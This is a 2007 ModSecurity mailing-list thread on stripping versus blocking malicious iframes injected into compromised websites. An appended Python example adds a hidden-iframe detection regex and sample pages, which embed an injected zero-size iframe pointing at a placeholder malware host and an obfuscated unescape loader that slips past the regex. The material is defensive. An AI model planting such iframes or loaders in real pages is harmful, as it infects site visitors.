[Modsecurity] iframe filtering rules

Michael Shinn mike at gotroot.com
Sat Sep 8 16:10:20 EDT 2007


Ryan Barnett wrote:
> One question for Michael - why just silently remove the malicious
> iframe?  Wouldn't it be better to implement these RegExs into
> ModSecurity rules that monitor outbound traffic and then block and alert
> in such situations?

As you know, better ultimately depends on what's important to the site
owner (I mean, how many people still share default passwords for
critical systems because it's "easier"?)  :-)

While I certainly don't see logging/alerting as mutually exclusive to
filtering out the content, blocking and filtering do have very different
outcomes for a site, so in some cases blocking may not be better.
Blocking is certainly more reliable and secure (what if you miss
something in the filtering method?), whereas filtering prevents you from
carrying out an availability attack against your own security model -
you know your content still gets to your user, and if it can be
reasonably assured to be malicious-free, win-win.  Either case works to
varying levels of assurance, so I wouldn't say one is better a priori
than the other; they each have trade-offs and serve different goals, but
in some cases one can be better than the other.

To that end, I'm going to be putting out OUTPUT rules that block
malicious content as well, but I've found that some sites can't use them
at all.  Blocking any of their own content is worse for them than
getting their users infected (Newspapers, Weather sites, Government
systems, etc.)

Ultimately, I think it depends on what's more important to each site
owner.  In some cases, yes, blocking outright is going to be the best
answer; for others, blocking your own content for your users might be
worse than letting them get infected.  It might be more important to say
"Tornado Warning" and accept the risk that a trojan might get through, than
risk someone not being able to pull up the Tornado Warning site.  :-)

In any case, it's certainly important to know that you got infected, which
you could do in parallel with stripping out the iframes.  Output
filtering, I think, has a special place for those cases where availability
is of critical importance to the site.

I'll take a look at mod_publisher next to see how it scales.  Thanks for
the tip Ryan.

>  
> -- 
> Ryan C. Barnett
> ModSecurity Community Manager
> Breach Security: Director of Application Security Training
> Web Application Security Consortium (WASC) Member
> CIS Apache Benchmark Project Lead
> SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
> Author: Preventing Web Attacks with Apache
> 
>  
> On 9/8/07, *Michael Shinn* <mike at gotroot.com <mailto:mike at gotroot.com>>
> wrote:
> 
>     Steve West wrote:
>     > Hi Michael,
>     >
>     > Thank you for the great tool! We've had a few customers web sites
>     have
>     > their web pages altered by hackers to add iframe tags, etc. The
>     > customers gave out their ftp credentials to the wrong people so we can't
>     > always protect against that. But I do have a few questions:
>     >
>     > 1. Is there any tool we can use if we are running apache 1.3.x?
> 
>     I'll look into it.  I'm not positive if apache 1.x supports external
>     filters.  If it does, then it should be easy enough to put this
>     together
>     for 1.3.x too.  A quick look doesn't seem to show mod_ext_filter is
>     supported in 1.3.x, so I'll have to look for other options.
> 
>     > 2. You should also add some filtering for obfuscated javascript which
>     > I'm seeing some recent hacks employ to get around security
>     > countermeasures on the server side.
> 
>     Thanks for the suggestion.  I'll see what I can put together for that
>     too.  If you have some examples, please send them my way and I'll see
>     what I
>     can put together this weekend.
> 
>     And for anyone wondering where the big update is, I'm almost finished
>     with it finally.  I'm just debugging a final problem with phase 2
>     transforms, which was stopping chained rules from working entirely.  So
>     many rules, so many dependencies...
> 
>     > thx,
>     >
>     > SW
>     >
>     >
>     > Michael Shinn wrote:
>     >> I put together a method for filtering out bad iframes from websites.
>     >> Output filtering, for websites that become infected.  You can
>     read on
>     >> for the details here:
>     >>
>     >> http://www.gotroot.com/tiki-read_article.php?articleId=278
>     >>
>     >> Rules update is in testing now, will be putting out a major overhaul
>     >> this week.  The major performance improvements will require
>     modsec 2.5.
>     >>
>     >>
>     >
> 
>     _______________________________________________
>     Modsecurity mailing list
>     Modsecurity at gotroot.com <mailto:Modsecurity at gotroot.com>
>     http://lists.gotroot.com/mailman/listinfo/modsecurity
> 
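The strip-versus-block trade-off discussed in this thread, as an added example that is not code from the original post, the gotroot rule set, or ModSecurity itself. The regex, the sample pages, the `malware.example.invalid` hostname, and the `inspect_response` helper are all constructed here for illustration. The third sample page shows the "what if you miss something" caveat: a loader that assembles the iframe from a percent-encoded string passes the iframe regex, so in strip mode it reaches the user while in block mode nothing does.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed detection regex for this example (not the gotroot rule set's
# pattern): an <iframe> whose attributes make it invisible to the user, i.e.
# zero width/height or a CSS rule hiding it.  It matches through the closing
# </iframe> when one is present.  Like any regex over HTML it can be evaded,
# e.g. by building the tag at runtime from escaped JavaScript; that gap is
# exactly what the third sample page below exercises.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*?"
    r"(?:width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)"
    r"[^>]*>(?:.*?</iframe\s*>)?",
    re.IGNORECASE | re.DOTALL,
)


@dataclass
class Decision:
    action: str            # "pass", "strip" or "block"
    status: int            # HTTP status the client sees
    body: str              # response body the client sees ("" when blocked)
    alerts: List[str] = field(default_factory=list)  # logged in every mode


def inspect_response(body: str, mode: str) -> Decision:
    """Apply an output policy to an HTML response body (hypothetical helper).

    mode="strip": availability first; remove the matched iframes and serve
                  the rest of the page (the mod_ext_filter approach).
    mode="block": security first; refuse to serve any page that matched
                  (the ModSecurity response-body deny approach).
    Both modes raise the same alerts, so detection is never lost.
    """
    matches = list(HIDDEN_IFRAME.finditer(body))
    alerts = [
        f"hidden iframe at offset {m.start()}: {m.group(0)[:72]!r}"
        for m in matches
    ]
    if not matches:
        return Decision("pass", 200, body, alerts)
    if mode == "block":
        return Decision("block", 403, "", alerts)
    if mode == "strip":
        return Decision("strip", 200, HIDDEN_IFRAME.sub("", body), alerts)
    raise ValueError(f"unknown mode {mode!r}")


# Constructed sample: a weather page defaced by an injected hidden iframe.
# The visible radar iframe is legitimate and must survive the strip.
# Hostnames are placeholders, not real malware domains.
CLEAN_PAGE = """<html><body>
<h1>Tornado Warning in effect until 6 PM</h1>
<iframe src="/radar/loop.html" width="640" height="480"></iframe>
<p>Seek shelter in an interior room.</p>
</body></html>
"""
INJECTED_IFRAME = (
    '<iframe src="http://malware.example.invalid/in.php" '
    'width=0 height=0 style="visibility:hidden"></iframe>\n'
)
INFECTED_PAGE = CLEAN_PAGE.replace("</body>", INJECTED_IFRAME + "</body>")

# Same defacement plus a loader the iframe rule does not cover: the tag is
# assembled from a percent-encoded string at runtime, so no literal
# "<iframe" appears in the response.
OBFUSCATED_LOADER = (
    "<script>document.write(unescape('%3Ciframe src=%22http://malware."
    "example.invalid/in.php%22 width=0 height=0%3E%3C/iframe%3E'))</script>\n"
)
PARTIALLY_COVERED_PAGE = INFECTED_PAGE.replace(
    "</body>", OBFUSCATED_LOADER + "</body>"
)


if __name__ == "__main__":
    pages = [("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE),
             ("partially covered", PARTIALLY_COVERED_PAGE)]
    for name, page in pages:
        for mode in ("strip", "block"):
            d = inspect_response(page, mode)
            print(f"{name:18} {mode:5} -> {d.action:5} {d.status} "
                  f"alerts={len(d.alerts)} loader_leaks={'unescape' in d.body}")
```

In ModSecurity terms the "block" branch corresponds to a rule over RESPONSE_BODY that denies in the response phase, and the "strip" branch to what mod_ext_filter does outside ModSecurity; the alerts list is the part both approaches should share, since knowing the site was infected matters regardless of which response the site owner chooses.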
